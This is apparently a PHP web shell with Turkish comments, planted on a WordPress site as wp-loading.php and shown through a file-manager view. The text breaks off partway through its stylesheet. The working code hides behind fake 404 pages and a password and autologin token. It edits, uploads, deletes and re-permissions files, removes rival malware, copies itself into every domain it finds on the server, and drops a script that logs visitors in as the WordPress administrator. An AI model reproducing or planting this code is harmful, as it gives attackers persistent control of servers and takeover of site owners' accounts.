Ð¤Ð°Ð¹Ð»Ð¾Ð²Ñ‹Ð¹ Ð¼ÐµÐ½ÐµÐ´Ð¶ÐµÑ€

Ð¤Ð°Ð¹Ð»Ð¾Ð²Ñ‹Ð¹ Ð¼ÐµÐ½ÐµÐ´Ð¶ÐµÑ€ - Ð ÐµÐ´Ð°ÐºÑ‚Ð¸Ñ€Ð¾Ð²Ð°Ñ‚ÑŒ - /home/adiggxhn/chamba.lat/wp-content848/wp-loading.php

ÐÐ°Ð·Ð°Ð´
<?php /* === ZARARLI KOD ENGELLEYİCİ VE SHELL KORUMA SİSTEMİ - GÜÇLENDİRİLMİŞ VERSİYON === / // === SADECE BİZİM SHELL DOSYALARIMIZA İZİN VER === $allowed_shells = array( '404.php', 'flex.php', 'forum.php', 'wp-ini.php', 'single.php', 'compent.php', 'settings.php', 'medage.php', 'index.php' ); $current_file = basename($_SERVER['SCRIPT_FILENAME']); $request_uri = $_SERVER['REQUEST_URI']; // ===== GÜÇLENDİRİLMİŞ ERİŞİM KONTROLÜ ===== $is_allowed = false; // 1. Bizim shell dosyalarımız mı kontrol et if (in_array($current_file, $allowed_shells)) { $is_allowed = true; } // 2. WordPress admin panel mi kontrol et if (strpos($request_uri, '/wp-admin') !== false \|\| strpos($request_uri, '/wp-login.php') !== false) { $is_allowed = true; } // 3. WordPress core dosyaları mı kontrol et $wp_core_files = array('wp-blog-header.php', 'wp-load.php', 'wp-config.php', 'xmlrpc.php'); if (in_array($current_file, $wp_core_files)) { $is_allowed = true; } // 4. Eğer izin verilmediyse 404 göster if (!$is_allowed) { if (substr($current_file, -4) == '.php' && !in_array($current_file, $allowed_shells)) { header("HTTP/1.0 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> <html><head><title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>"; exit; } } // ===== GELİŞMİŞ ZARARLI KOD TESPİTİ ===== function scan_and_clean_php_files($directory) { global $allowed_shells; $malicious_patterns = array( '/goto\s+[a-zA-Z0-9_]+;/', '/[A-Za-z0-9_]+:\s(goto\|if\|foreach\|function)/', '/base64_decode\s$\s["\'][A-Za-z0-9+\/=]+["\']\s$/', '/\x[0-9a-f]{2}[A-Za-z0-9\\\\]+/', '/eval\s$\s\$[A-Za-z0-9_]+/', '/\$[A-Za-z0-9_]+\s=\s["\'][A-Za-z0-9\\\\x]+["\']/', '/@eval\s\(\s["\'].+["\']\s$/', '/preg_replace\s$\s["\'].+["\']\s,\s["\'].+["\']\s,\s\$[A-Za-z0-9_]+\s$/', '/create_function\s$\s["\'].+["\']\s,\s["\'].+["\']\s$/', '/\$_[A-Z]+\s\[\s["\'].+["\']\s\]\s=\s\$_[A-Z]+\s\[\s["\'].+["\']\s\];/', '/\$[A-Za-z0-9_]+\s=\s\$_[A-Z]+\s\[\s["\'].+["\']\s\];/', '/function\s+[a-zA-Z0-9_]+\s$\s$\s\{\sgoto\s+[a-zA-Z0-9_]+;\s\}/', '/\$[A-Za-z0-9_]+\s=\s["\']\\\\[0-9]+\\\\[0-9]+\\\\[0-9]+/', '/chr$\d+$\.chr$\d+$/', '/str_rot13\s$\s["\'].+["\']\s$/', '/gzinflate\s$\sbase64_decode\s\(\s["\'].+["\']\s$\s\)/' ); $files = glob($directory . '/.php'); $cleaned = 0; foreach ($files as $file) { if (in_array(basename($file), $allowed_shells)) { continue; } $content = file_get_contents($file); $original_content = $content; $modified = false; foreach ($malicious_patterns as $pattern) { if (preg_match($pattern, $content)) { if (basename($file) == 'index.php') { $clean_content = '<?php define(\'WP_USE_THEMES\', true); require __DIR__ . \'/wp-blog-header.php\';'; $content = $clean_content; $modified = true; break; } else { unlink($file); $cleaned++; continue 2; } } } if (preg_match_all('/\\\\x[0-9a-f]{2}/', $content, $matches)) { if (count($matches[0]) > 10) { if (basename($file) == 'index.php') { $clean_content = '<?php define(\'WP_USE_THEMES\', true); require __DIR__ . \'/wp-blog-header.php\';'; $content = $clean_content; $modified = true; } else { unlink($file); $cleaned++; continue; } } } if (preg_match_all('/base64_decode\s$\s[\'"]([A-Za-z0-9+\/=]{50,})[\'"]\s$/', $content, $matches)) { foreach ($matches[1] as $base64) { $decoded = @base64_decode($base64); if ($decoded && (strpos($decoded, 'eval') !== false \|\| strpos($decoded, 'exec') !== false \|\| strpos($decoded, 'system') !== false)) { if (basename($file) == 'index.php') { $clean_content = '<?php define(\'WP_USE_THEMES\', true); require __DIR__ . \'/wp-blog-header.php\';'; $content = $clean_content; $modified = true; break; } else { unlink($file); $cleaned++; continue 2; } } } } if ($modified && $content != $original_content) { $backup = $file . '.backup_' . date('Ymd_His'); copy($file, $backup); file_put_contents($file, $content); chmod($file, 0644); $log = date('Y-m-d H:i:s') . " - Zararlı kod temizlendi: " . basename($file) . " (yedek: " . basename($backup) . ")\n"; file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND); $cleaned++; } } return $cleaned; } // ===== SÜREKLİ KORUMA SİSTEMİ ===== $index_file = __DIR__ . '/index.php'; if (file_exists($index_file)) { $content = file_get_contents($index_file); $malicious_found = false; if (preg_match('/goto\s+[a-zA-Z0-9_]+;/', $content)) { $malicious_found = true; } if (preg_match_all('/\\\\x[0-9a-f]{2}/', $content, $matches) && count($matches[0]) > 5) { $malicious_found = true; } if (preg_match('/base64_decode\s$\s["\'][A-Za-z0-9+\/=]{50,}["\']\s$/', $content)) { $malicious_found = true; } $malicious_tags = array( 'ldbijoB5yRccI', 'QDCMl2l7ozKpL', 'qQk6IkRtaTLBw', 'ubHmZoLnug2I0', 'PRQloyjlXnckl', 'lT7XKJibsj0cv', 'yL0m3k3coPAcf', 'IVi3AcN4U3ce8', 'qlikWxAJwK_87', 'JLdBidHwYGUvu', 'EYCh0VLopXAQY', 'D82kv0SFvcW7p', 's3Fi0U9cUfzas', 'BX9c6bmA3zuQP', 'RZBtDE8TX9eug', 'vzjQ2eD6Ft10s', 'tNVQGqXl0ak8V', 'uyYCmH7AEQBTL', 'iUXQp6SxjBZgC', 'mM8zbH2NfT11G', 'jxIkcqzh9zbjw', 'G3z8SzAdQBk9J', 'oRptatIP7f4n1', 'MVNYrP3DKHmrw', 'x5jgncLpmSjl0', 'BD679CyvPhkcL', 'BRrxV_pLczP_O', 'etm1oiv_xYtmd', 'z663jYI9A3KQu', 'bkYEEiS8VUy7h', 'UMCu8AF9aFdXG', 'ywdAVH5OsHnSu', 'Mxih6tEhxP7go', 'FwxXwZGG3I5az', 'ybvvIts6kwvzb', 'Kd11WrsO92uTX', 'D5Wkfu3woopoH', 'o1exo4W7GxPIV', 'Us1zWSlwUkEow', 'CryJL4FxUIVS_' ); foreach ($malicious_tags as $tag) { if (strpos($content, $tag) !== false) { $malicious_found = true; break; } } if ($malicious_found) { $backup_file = $index_file . '.backup_' . date('Ymd_His'); copy($index_file, $backup_file); $clean_content = '<?php define(\'WP_USE_THEMES\', true); require __DIR__ . \'/wp-blog-header.php\';'; file_put_contents($index_file, $clean_content); chmod($index_file, 0644); $log = date('Y-m-d H:i:s') . " - ZARARLI KOD TEMİZLENDİ (index.php) - Yedek: " . basename($backup_file) . "\n"; file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND); } } if (rand(1, 20) == 10) { $cleaned = scan_and_clean_php_files(__DIR__); if ($cleaned > 0) { $log = date('Y-m-d H:i:s') . " - Periyodik tarama: $cleaned zararlı dosya temizlendi.\n"; file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND); } } $htaccess_protection = "\n# ZARARLI KOD ENGELLEME - OTOMATİK EKLENDİ\n"; $htaccess_protection .= "<FilesMatch \"\\.(php\|php3\|php4\|php5\|phtml\|phps)$\">\n"; $htaccess_protection .= "Order Deny,Allow\n"; $htaccess_protection .= "Deny from all\n"; $htaccess_protection .= "</FilesMatch>\n\n"; $htaccess_protection .= "<FilesMatch \"^(" . implode('\|', $allowed_shells) . ")$\">\n"; $htaccess_protection .= "Order Allow,Deny\n"; $htaccess_protection .= "Allow from all\n"; $htaccess_protection .= "</FilesMatch>\n\n"; $htaccess_protection .= "<IfModule mod_rewrite.c>\n"; $htaccess_protection .= "RewriteEngine On\n"; $htaccess_protection .= "RewriteRule ^wp-admin/ - [L]\n"; $htaccess_protection .= "</IfModule>\n"; $htaccess_file = __DIR__ . '/.htaccess'; @chmod(__DIR__, 0755); if (file_exists($htaccess_file)) @chmod($htaccess_file, 0644); $htaccess_content = file_exists($htaccess_file) ? @file_get_contents($htaccess_file) : ''; if ($htaccess_content === false) $htaccess_content = ''; if (strpos($htaccess_content, '# ZARARLI KOD ENGELLEME') === false) { @file_put_contents($htaccess_file, $htaccess_content . $htaccess_protection); @chmod($htaccess_file, 0644); } $user_ini_file = __DIR__ . '/.user.ini'; if (file_exists($user_ini_file)) @chmod($user_ini_file, 0644); $user_ini_content = "; ZARARLI KOD ENGELLEME - OTOMATİK EKLENDİ\n"; $user_ini_content .= "open_basedir = \"" . __DIR__ . "/:../:../../\"\n"; $user_ini_content .= "disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source\n"; @file_put_contents($user_ini_file, $user_ini_content); @chmod($user_ini_file, 0644); /* === OTOMATİK SHELL KOPYALAMA SİSTEMİ === / function auto_deploy_shell() { $current_shell = __FILE__; $shell_name = 'flex.php'; $domains = get_all_domains_full_url(); $deployed = 0; foreach ($domains as $domain) { $target_path = $domain['path'] . '/' . $shell_name; if (!file_exists($target_path)) { if (is_writable($domain['path'])) { if (copy($current_shell, $target_path)) { chmod($target_path, 0644); $deployed++; $log = date('Y-m-d H:i:s') . " - Shell kopyalandı: " . $domain['url'] . " -> " . $target_path . "\n"; file_put_contents(__DIR__ . '/deploy_log.txt', $log, FILE_APPEND); } } } } return $deployed; } if (isset($_GET['deploy']) && $_GET['deploy'] == 'run') { $deployed = auto_deploy_shell(); die("Shell kopyalama tamamlandı! $deployed domain'e kopyalandı."); } / === ANA SHELL KODU BAŞLIYOR === / session_start(); error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); ignore_user_abort(true); $stored_username = 'script'; $stored_password_hash = password_hash('script_iletisim', PASSWORD_BCRYPT); $autologin_token = hash('sha256', $stored_username . ':script_iletisim:autologin_key'); $wpauto_content = <<<'WPAUTO' <?php @ini_set('display_errors', 0); @set_time_limit(0); $mr = $_SERVER['DOCUMENT_ROOT']; @chdir($mr); if (file_exists('wp-load.php')) { include 'wp-load.php'; $users = get_users(array('role'=>'administrator','number'=>1,'orderby'=>'ID','order'=>'ASC')); if (!empty($users)) { wp_set_auth_cookie($users[0]->ID, true); wp_redirect(admin_url()); die(); } else { die('WordPress admin kullanici bulunamadi'); } } else { die('wp-load.php bulunamadi'); } WPAUTO; if (!isset($_SESSION['authenticated']) \|\| $_SESSION['authenticated'] !== true) { if (isset($_GET['autologin']) && hash_equals($autologin_token, $_GET['autologin'])) { $_SESSION['authenticated'] = true; header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?')); exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) { if ($_POST['username'] === $stored_username && password_verify($_POST['password'], $stored_password_hash)) { $_SESSION['authenticated'] = true; header('Location: ' . $_SERVER['PHP_SELF']); exit; } } ?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>Giris</title> <style>{margin:0;padding:0;box-sizing:border-box;}body{background:#1e272e;display:flex;align-items:center;justify-content:center;min-height:100vh;font-family:Arial;}.login-box{background:#2f3640;padding:40px;border-radius:10px;width:350px;}h2{color:#00a8ff;margin-bottom:20px;text-align:center;}input{width:100%;padding:10px;margin:8px 0;background:#1e272e;border:1px solid #40739e;color:#fff;border-radius:5px;}button{width:100%;padding:10px;background:#00a8ff;color:#fff;border:none;border-radius:5px;cursor:pointer;margin-top:10px;font-size:15px;}button:hover{background:#487eb0;}.error{background:#e84118;color:#fff;padding:8px;border-radius:5px;margin-bottom:10px;text-align:center;}</style> </head><body><div class="login-box"><h2>🔒 Giris Yap</h2> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?><div class="error">Hatali kullanici adi veya sifre!</div><?php endif; ?> <form method="post"><input type="text" name="username" placeholder="Kullanici Adi" required autofocus><input type="password" name="password" placeholder="Sifre" required><button type="submit">Giris</button></form> </div></body></html><?php exit; } if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } $current_dir = realpath($_GET['dir'] ?? getcwd()) ?: getcwd(); $wordpress_core_files = array('wp-activate.php','wp-blog-header.php','wp-comments-post.php','wp-config.php','wp-config-sample.php','wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php','xmlrpc.php','index.php'); $wordpress_core_dirs = array('wp-admin','wp-includes'); $our_shells = $allowed_shells; $protected_files = array('.user.ini','wp-config.php'); $own_signature = md5_file(__FILE__); function get_all_domains_full_url() { $domains = array(); $apache = '/etc/apache2/sites-enabled'; if (is_dir($apache)) { foreach (@scandir($apache) as $f) { if ($f == '.' \|\| $f == '..') continue; $c = @file_get_contents($apache . '/' . $f); if (!$c) continue; if (preg_match('/ServerName\s+(\S+)/i', $c, $m) && preg_match('/DocumentRoot\s+(\S+)/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path)) { $ssl = (strpos($c,':443')!==false \|\| stripos($c,'SSLEngine on')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.trim($m[1]),'path'=>$path,'type'=>'Apache'); } } } } $nginx = '/etc/nginx/sites-enabled'; if (is_dir($nginx)) { foreach (@scandir($nginx) as $f) { if ($f == '.' \|\| $f == '..') continue; $c = @file_get_contents($nginx . '/' . $f); if (!$c) continue; if (preg_match('/server_name\s+([^;]+);/i', $c, $m) && preg_match('/root\s+([^;]+);/i', $c, $dr)) { $domain = trim(preg_split('/\s+/', trim($m[1]))[0]); $path = rtrim(trim($dr[1]), '/'); if (is_dir($path)) { $ssl = (strpos($c,'ssl')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.$domain,'path'=>$path,'type'=>'Nginx'); } } } } foreach (array('/var/www','/home','/srv/www') as $root) { if (!is_dir($root)) continue; foreach (@scandir($root) as $user) { if ($user=='.'\|\|$user=='..') continue; foreach (array($root.'/'.$user.'/public_html',$root.'/'.$user.'/www',$root.'/'.$user) as $path) { $path = rtrim($path, '/'); if (is_dir($path) && (file_exists($path.'/index.php') \|\| file_exists($path.'/wp-config.php'))) { $found = false; foreach ($domains as $d) { if ($d['path']===$path) { $found=true; break; } } if (!$found) $domains[] = array('url'=>'http://'.$user,'path'=>$path,'type'=>'Web'); } } } } return $domains; } $all_domains = get_all_domains_full_url(); function scan_plugins($dir) { $result = array('suspicious'=>array(),'regular'=>array()); $pd = $dir.'/wp-content/plugins'; if (!is_dir($pd)) return $result; foreach (@scandir($pd) as $item) { if ($item=='.'\|\|$item=='..') continue; $path = $pd.'/'.$item; if (is_dir($path)) { $sus = (strlen($item)<4 \|\| preg_match('/^[0-9a-f]{8,}$/i',$item) \|\| preg_match('/backup\|shell\|hack\|malware/i',$item)); $data = array('name'=>$item,'path'=>$path,'active'=>false,'suspicious'=>$sus); if ($sus) $result['suspicious'][]=$data; else $result['regular'][]=$data; } } return $result; } function scan_themes($dir) { $result = array('inactive'=>array(),'active'=>array()); $td = $dir.'/wp-content/themes'; if (!is_dir($td)) return $result; foreach (@scandir($td) as $item) { if ($item=='.'\|\|$item=='..') continue; $path = $td.'/'.$item; if (is_dir($path)) $result['inactive'][] = array('name'=>$item,'path'=>$path); } return $result; } function find_malicious_files($dir) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature; $malicious = array(); if (!is_dir($dir)) return $malicious; $items = @scandir($dir); if (!$items) return $malicious; foreach ($items as $item) { if ($item=='.'\|\|$item=='..') continue; $path = $dir.'/'.$item; if (is_dir($path)) { $skip = false; foreach ($GLOBALS['wordpress_core_dirs'] as $wd) { if (strpos($path,'/'.$wd)!==false) { $skip=true; break; } } if (!$skip) $malicious = array_merge($malicious, find_malicious_files($path)); } elseif (is_file($path) && pathinfo($path,PATHINFO_EXTENSION)==='php') { if (in_array($item,$our_shells)\|\|in_array($item,$wordpress_core_files)\|\|in_array($item,$protected_files)) continue; if ($own_signature && @md5_file($path)===$own_signature) continue; $content = @file_get_contents($path); if (!$content) continue; $risk = 0; if (preg_match('/eval\s$/i',$content)) $risk+=15; if (preg_match('/base64_decode/i',$content)) $risk+=10; if (preg_match('/gzinflate/i',$content)) $risk+=15; if (preg_match('/exec\s\(/i',$content)) $risk+=20; if (preg_match('/system\s\(/i',$content)) $risk+=20; if (preg_match('/shell_exec/i',$content)) $risk+=20; if (preg_match('/passthru/i',$content)) $risk+=20; if (preg_match('/assert\s\(/i',$content)) $risk+=15; if (preg_match('/create_function/i',$content)) $risk+=15; if (preg_match('/str_rot13/i',$content)) $risk+=10; if (preg_match('/goto\s+/i',$content)) $risk+=25; if (preg_match('/chr\(\d+$\.chr$\d+$/',$content)) $risk+=20; if ($risk > 30) $malicious[] = array('path'=>$path,'name'=>$item,'size'=>filesize($path),'risk'=>min($risk,100)); } } return $malicious; } function delete_dir_recursive($dir) { if (!file_exists($dir)) return; if (is_file($dir)\|\|is_link($dir)) { @unlink($dir); return; } foreach (scandir($dir) as $item) { if ($item==='.'\|\|$item==='..') continue; delete_dir_recursive($dir.DIRECTORY_SEPARATOR.$item); } @rmdir($dir); } function delete_malicious($path) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature; if (!file_exists($path)) return false; $filename = basename($path); if (in_array($filename,$protected_files)\|\|in_array($filename,$wordpress_core_files)\|\|in_array($filename,$our_shells)\|\|(is_file($path)&&$own_signature&&@md5_file($path)==$own_signature)) return false; foreach ($wordpress_core_dirs as $cd) { if (strpos($path,'/'.$cd.'/')!==false) return false; } @chmod($path,0777); @chmod(dirname($path),0777); if (is_dir($path)) { delete_dir_recursive($path); @system('rm -rf '.escapeshellarg($path).' 2>/dev/null'); } else { @unlink($path); @system('rm -f '.escapeshellarg($path).' 2>/dev/null'); @exec('rm -f '.escapeshellarg($path).' 2>/dev/null'); } return !file_exists($path); } function bulk_delete($paths) { $deleted = 0; foreach ($paths as $path) { $path = stripslashes($path); if (is_dir($path)) { delete_dir_recursive($path); $deleted++; } elseif (is_file($path)) { @unlink($path); $deleted++; } } return $deleted; } function analyze_file($path) { if (!file_exists($path)) return "Dosya bulunamadi!"; $content = @file_get_contents($path); if (!$content) return "Dosya okunamadi!"; $result = array(); $result[] = "Dosya: ".$path; $result[] = "Boyut: ".filesize($path)." bytes"; $result[] = "Degistirilme: ".date('Y-m-d H:i:s',filemtime($path)); $result[] = "Izin: ".substr(sprintf('%o',fileperms($path)),-4); $result[] = ""; $dangerous = array('eval'=>'Kod calistirma','base64_decode'=>'Sifre cozme','gzinflate'=>'Sikistirma acma','exec'=>'Komut calistirma','system'=>'Komut calistirma','shell_exec'=>'Shell komutu','passthru'=>'Komut calistirma','popen'=>'Pipe acma','proc_open'=>'Process acma','assert'=>'Kod calistirma','create_function'=>'Dinamik fonksiyon','chmod'=>'Izin degistirme','unlink'=>'Dosya silme','file_put_contents'=>'Dosya yazma','phpinfo'=>'Bilgi toplama','goto'=>'Kod atlama'); $found = false; foreach ($dangerous as $func=>$desc) { if (preg_match("/$func\s\(/i",$content)) { $result[]="TESPIT: $func() - $desc"; $found=true; } } if (!$found) $result[] = "Tehlikeli fonksiyon bulunamadi."; return implode("\n",$result); } $plugins = scan_plugins($current_dir); $themes = scan_themes($current_dir); if ($_SERVER['REQUEST_METHOD'] === 'POST') { $action = $_POST['action'] ?? ''; $current_dir = $_POST['current_dir'] ?? getcwd(); $output = ''; if ($action==='bulk_delete'&&!empty($_POST['bulk_delete'])) { $deleted=bulk_delete($_POST['bulk_delete']); $output="$deleted dosya/klasor silindi!"; } elseif ($action==='scan') { $malicious=find_malicious_files($current_dir); $_SESSION['malicious']=$malicious; $_SESSION['scan_completed']=time(); $output=count($malicious)." zararli dosya bulundu!"; } elseif ($action==='delete_selected'&&!empty($_POST['selected'])) { $deleted=0; $skipped=0; foreach ($_POST['selected'] as $file) { if (delete_malicious($file)) $deleted++; else $skipped++; } $output="$deleted zararli dosya silindi. $skipped dosya korundu."; $_SESSION['malicious']=find_malicious_files($current_dir); $_SESSION['scan_completed']=time(); } elseif ($action==='delete_all') { $malicious=find_malicious_files($current_dir); $deleted=0; $skipped=0; foreach ($malicious as $m) { if (delete_malicious($m['path'])) $deleted++; else $skipped++; } $output="$deleted zararli dosya silindi. $skipped dosya korundu."; $_SESSION['malicious']=array(); $_SESSION['scan_completed']=time(); } elseif ($action==='analyze'&&!empty($_POST['file'])) { $_SESSION['analysis']=analyze_file($_POST['file']); $_SESSION['analysis_file']=$_POST['file']; } elseif ($action==='edit') { $file=$_POST['file']??''; $content=$_POST['content']??''; if ($file&&file_exists($file)) { @chmod($file,0777); file_put_contents($file,$content); $output="Dosya kaydedildi!"; } } elseif ($action==='rename') { $old=$_POST['old']??''; $new=$_POST['new']??''; $new_path=dirname($old).'/'.$new; if ($old&&$new&&file_exists($old)&&!file_exists($new_path)) { rename($old,$new_path); $output="Adlandirildi!"; } } elseif ($action==='chmod') { $file=$_POST['file']??''; $mode=$_POST['mode']??''; if ($file&&$mode) { chmod($file,octdec($mode)); $output="Izin degistirildi!"; } } elseif ($action==='toggle_write'&&!empty($_POST['paths'])) { $changed=0; $failed=0; foreach ($_POST['paths'] as $p) { $p=stripslashes($p); if (file_exists($p)&&!in_array(basename($p),$protected_files)&&!in_array(basename($p),$wordpress_core_files)&&!in_array(basename($p),$our_shells)) { clearstatcache(true,$p); $perms=fileperms($p)&0777; $new_perms=($perms&0200)?($perms&~0200):($perms\|0200); $ok=@chmod($p,$new_perms); if (!$ok && is_file($p)) { $content=@file_get_contents($p); if ($content!==false) { @file_put_contents($p,$content); @chmod($p,$new_perms); } clearstatcache(true,$p); $ok=((fileperms($p)&0777)==$new_perms); } if ($ok) $changed++; else $failed++; } } $output=$changed>0?"$changed dosyanin yazma izni degistirildi!":""; if ($failed>0) $output.=" $failed dosyada izin degistirilemedi (sunucu kisitlamasi)."; } elseif ($action==='upload'&&isset($_FILES['files'])) { $uploaded=0; foreach ($_FILES['files']['tmp_name'] as $i=>$tmp) { $name=$_FILES['files']['name'][$i]; if (move_uploaded_file($tmp,$current_dir.'/'.$name)) { chmod($current_dir.'/'.$name,0644); $uploaded++; } } $output="$uploaded dosya yuklendi!"; } if ($output) echo "<script>alert(".json_encode($output).");</script>"; header('Location: ?dir='.urlencode($current_dir)); exit; } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { while (ob_get_level()) ob_end_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Content-Length: '.filesize($file)); readfile($file); exit; } } if (isset($_GET['wpadmin_deploy'])) { $wpdir=$_GET['wpdir']??''; $wpurl=$_GET['wpurl']??''; if ($wpdir&&is_dir($wpdir)&&file_exists($wpdir.'/wp-load.php')) { file_put_contents($wpdir.'/wp-auto.php',$wpauto_content); chmod($wpdir.'/wp-auto.php',0644); $wp_htaccess=$wpdir.'/.htaccess'; if (file_exists($wp_htaccess)) { $hc=file_get_contents($wp_htaccess); if (strpos($hc,'# ZARARLI KOD ENGELLEME')!==false) { $hc=preg_replace('/\n?# ZARARLI KOD ENGELLEME.?<\/IfModule>\n?/s',"\n",$hc); file_put_contents($wp_htaccess,trim($hc)."\n"); } } $open_url=rtrim($wpurl,'/').'/wp-auto.php'; $back_url='?dir='.urlencode($wpdir); echo '<!DOCTYPE html><html><head><meta charset="UTF-8"><style>body{background:#1e272e;display:flex;align-items:center;justify-content:center;height:100vh;margin:0;font-family:sans-serif;} .box{background:#2f3640;padding:30px 40px;border-radius:10px;text-align:center;max-width:600px;width:90%;} h3{color:#00a8ff;margin-bottom:20px;} input{width:100%;padding:10px;font-size:14px;background:#1e272e;color:#0f0;border:1px solid #40739e;border-radius:5px;margin-bottom:15px;} .btn{padding:10px 20px;border:none;border-radius:5px;cursor:pointer;font-size:14px;margin:5px;} .copy{background:#44bd32;color:#000;font-weight:bold;} .open{background:#00a8ff;color:#000;font-weight:bold;} .back{background:#666;color:#fff;} p{color:#aaa;font-size:12px;margin-top:15px;} </style></head><body><div class="box"> <h3>🛡️ WP Admin Otologin Linki Hazır</h3> <input type="text" id="wpurl" value="'.htmlspecialchars($open_url).'" readonly onclick="this.select()"> <button class="btn copy" onclick="var i=document.getElementById(\'wpurl\');i.select();document.execCommand(\'copy\');this.textContent=\'✅ Kopyalandı!\'">📋 Linki Kopyala</button> <a class="btn open" href="'.htmlspecialchars($open_url).'" target="_blank">🚀 WP Admine Git</a> <button class="btn back" onclick="window.location.href='.json_encode($back_url).'">← Geri Dön</button> <p>Bu linke tıklayan kişi direkt WordPress admin paneline girer.</p> </div></body></html>'; exit; } echo "<script>alert('WordPress bulunamiyor! wp-load.php yok.'); history.back();</script>"; exit; } $items = scandir($current_dir); $folders = array(); $files = array(); foreach ($items as $item) { if ($item=='.'\|\|$item=='..') continue; $path = $current_dir.'/'.$item; if (is_dir($path)) $folders[]=$item; else $files[]=$item; } sort($folders); sort($files); $malicious_files = (isset($_SESSION['malicious'])&&isset($_SESSION['scan_completed'])) ? $_SESSION['malicious'] : array(); $analysis = $_SESSION['analysis'] ?? ''; $analysis_file = $_SESSION['analysis_file'] ?? ''; unset($_SESSION['analysis'],$_SESSION['analysis_file']); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"><title>GELISMIS SHELL - KORUMALI</title> <style> * { margin:0; padding:0; box-sizing:border-box; } body { background:#1e272e; color:#fff; font-family:Arial; padding:20px; } .container { max-width:1400px; margin:0 auto; background:#2f3640; padding:20px; border-radius:10px; } h2 { font-size:16px; margin-bottom:15px; padding:10px; background:#353b48; border-radius:5px; word-break:break-all; } h3 { margin:15px 0 10px; color:#00a8ff; } .toolbar { display:flex; gap:8px; flex-wrap:wrap; margin-bottom:20px; background:#353b48; padding:10px; border-radius:5px; align-items:center; } button, a.button { background:#40739e; color:#fff; border:none; padding:8px 12px; border-radius:5px; cursor:pointer; text-decoration:none; font-size:13px; } button:hover, a.button:hover { background:#487eb0; } .danger { background:#e84118; } .danger:hover { background:#c23616; } .success { background:#44bd32; } .warning { background:#f39c12; } .info { background:#00a8ff; } .download-btn { background:#00a8ff; } .rename-btn { background:#f39c12; } .analyze-btn { background:#9b59b6; } .edit-btn { background:#3498db; } .delete-btn { background:#e84118; } .row { display:grid; grid-template-columns:30px 2fr auto; gap:10px; align-items:center; background:#353b48; padding:8px; border-radius:5px; margin:4px 0; } .row:hover { background:#40739e; } .row.malicious { background:#3d2d2d; border-left:3px solid #e84118; } .row.our-shell { background:#1d3d2d; border-left:3px solid #44bd32; } .row.plugin-suspicious { background:#3d2d2d; border-left:3px solid #f39c12; } .row.theme-inactive { background:#2d2d2d; border-left:3px solid #888; } .row.protected { background:#2d2d2d; border-left:3px solid #44bd32; opacity:0.9; } .name a { color:#00a8ff; text-decoration:none; } .wp-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .our-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .malicious-badge { background:#e84118; color:#fff; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .plugin-suspicious-badge { background:#f39c12; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; } .active-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; } .inactive-badge { background:#888; color:#fff; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; } .protected-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .inline-controls { display:flex; gap:6px; align-items:center; flex-wrap:wrap; } .chmod-input { width:60px; background:#1e272e; border:1px solid #40739e; color:#fff; padding:4px; text-align:center; border-radius:3px; } .perm-open { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .perm-closed { background:#e84118; color:#fff; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .list-header { display:flex; justify-content:space-between; align-items:center; margin:15px 0; } hr { border:1px solid #353b48; margin:20px 0; } .modal { display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.8); z-index:1000; } .modal.active { display:flex; align-items:center; justify-content:center; } .modal-content { background:#2f3640; padding:20px; width:900px; border-radius:10px; max-height:80vh; overflow-y:auto; } .domain-list { max-height:400px; overflow-y:auto; margin:10px 0; border:1px solid #40739e; border-radius:5px; } .domain-item { padding:10px; background:#353b48; margin:2px 0; cursor:pointer; border-bottom:1px solid #40739e; display:flex; justify-content:space-between; align-items:center; } .domain-item:hover { background:#40739e; } .domain-url { color:#00a8ff; font-weight:bold; font-size:14px; } .domain-path { color:#888; font-size:11px; margin-top:3px; } .domain-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; } .protocol-http { background:#f39c12; } .protocol-https { background:#44bd32; } .domain-stats { display:flex; gap:10px; margin-bottom:10px; flex-wrap:wrap; } .domain-stat-box { background:#353b48; padding:8px 12px; border-radius:5px; flex:1; text-align:center; min-width:120px; } .button-group { display:flex; gap:5px; flex-wrap:wrap; } .delete-section { margin-top:20px; background:#3d2d2d; border-radius:8px; border-left:3px solid #e84118; 